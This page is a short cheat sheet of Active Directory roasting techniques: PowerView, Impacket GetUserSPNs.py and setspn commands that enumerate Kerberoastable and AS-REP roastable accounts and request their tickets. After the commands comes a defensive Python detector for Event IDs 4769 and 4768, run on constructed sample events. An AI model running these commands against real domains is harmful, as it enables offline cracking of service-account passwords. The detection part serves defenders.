Roasting
Finding Kerberoastable users
tip
If the SPN requested is registered for a user account rather than a computer account, the user's password is used to encrypt the service ticket.
Powerview
Get-DomainUser -SPN -Properties distinguishedname,serviceprincipalname [-Domain FOREIGN]
VBS
cscript.exe GetUserSPNs.vbs
Impacket GetUserSPNs.py
GetUserSPNs.py <domain_name>/<username>:<password> -dc-ip <dc_ip> -request
Manually
info
This produces a very large output that needs manual triage (check for USER accounts, as opposed to computer accounts).
setspn -T <DOMAIN> -F -Q */*
AS-REP Roasting
tip
AS-REP roasting uses the AS-REP (the reply to a TGT request, not a TGS request) and only works for accounts on which Kerberos pre-authentication is not enabled.
PowerView
Get-DomainUser -PreauthNoRequired -Properties distinguishedname
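From the defender's side, both techniques above leave a signature in the domain controller's Security log: Kerberoasting shows up as one principal requesting RC4-HMAC (TicketEncryptionType 0x17) service tickets (Event ID 4769) for many user-account SPNs in a short window, and AS-REP roasting as a TGT issued (Event ID 4768) with PreAuthType 0 and an RC4-encrypted reply. The following detection logic is an added example for this page, not part of the original cheat sheet or of PowerView or Impacket. The event records are constructed samples shaped after the 4769/4768 fields; the threshold and window values are assumptions to tune per environment.

```python
"""Detect Kerberoasting and AS-REP roasting indicators in Windows Security
event records (Event IDs 4769 and 4768).

Added example; the sample events below are constructed, not real log data.
Field names follow the Windows Security log (TargetUserName, ServiceName,
TicketEncryptionType, PreAuthType, IpAddress). The threshold and window are
assumed tuning values, not vendor guidance.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType value for RC4-HMAC (weakest, crackable offline)

# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    # benign: AES service ticket for a computer account
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:00:01", "TargetUserName": "alice",
     "ServiceName": "WS01$", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.15"},
    # suspicious burst: one principal pulls RC4 tickets for several user SPNs
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:01:00", "TargetUserName": "alice",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.15"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:01:02", "TargetUserName": "alice",
     "ServiceName": "httpsvc", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.15"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:01:05", "TargetUserName": "alice",
     "ServiceName": "mssql02", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.15"},
    # krbtgt tickets are TGT renewals, not a service to roast
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:01:06", "TargetUserName": "alice",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.15"},
    # a single RC4 ticket: legacy application, below threshold
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:30:00", "TargetUserName": "bob",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.20"},
    # AS-REP roasting indicator: TGT issued without pre-authentication, RC4 reply
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:05:00", "TargetUserName": "svc_backup",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.99"},
    # benign TGT: pre-authenticated with an encrypted timestamp, AES
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:05:30", "TargetUserName": "alice",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.15"},
]


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def detect_kerberoasting(events, threshold=3, window=timedelta(minutes=5)):
    """Return {requesting_account: sorted services} for accounts that obtained
    RC4 service tickets for at least `threshold` distinct non-computer
    services within `window`.  Computer accounts (ServiceName ending in '$')
    and krbtgt are excluded because their keys are not user passwords."""
    per_account = defaultdict(list)
    for e in events:
        if e.get("EventID") != 4769 or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_account[e["TargetUserName"]].append((_ts(e), svc))

    hits = {}
    for account, reqs in per_account.items():
        reqs.sort()
        # sliding window: from each request, count distinct services within `window`
        for i, (t0, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(services) >= threshold:
                hits[account] = sorted(services)
                break
    return hits


def detect_asrep_roasting(events):
    """Return the sorted accounts issued a TGT with PreAuthType 0 (no
    pre-authentication) and an RC4-encrypted reply: the AS-REP roasting
    signature.  TargetUserName in 4768 is the account the TGT was issued for,
    i.e. the roastable account, so this doubles as an inventory of accounts
    that should have pre-authentication re-enabled."""
    return sorted({
        e["TargetUserName"] for e in events
        if e.get("EventID") == 4768
        and e.get("PreAuthType") == "0"
        and e.get("TicketEncryptionType") == RC4_HMAC
    })


if __name__ == "__main__":
    print("Kerberoasting:", detect_kerberoasting(SAMPLE_EVENTS))
    print("AS-REP roasting:", detect_asrep_roasting(SAMPLE_EVENTS))
```

The RC4 filter alone produces false positives in domains where legacy applications still negotiate RC4, which is why the Kerberoasting rule also requires a burst of distinct services from one principal; in a domain where AES is enforced for service accounts, any 0x17 ticket for a user SPN is worth a look on its own.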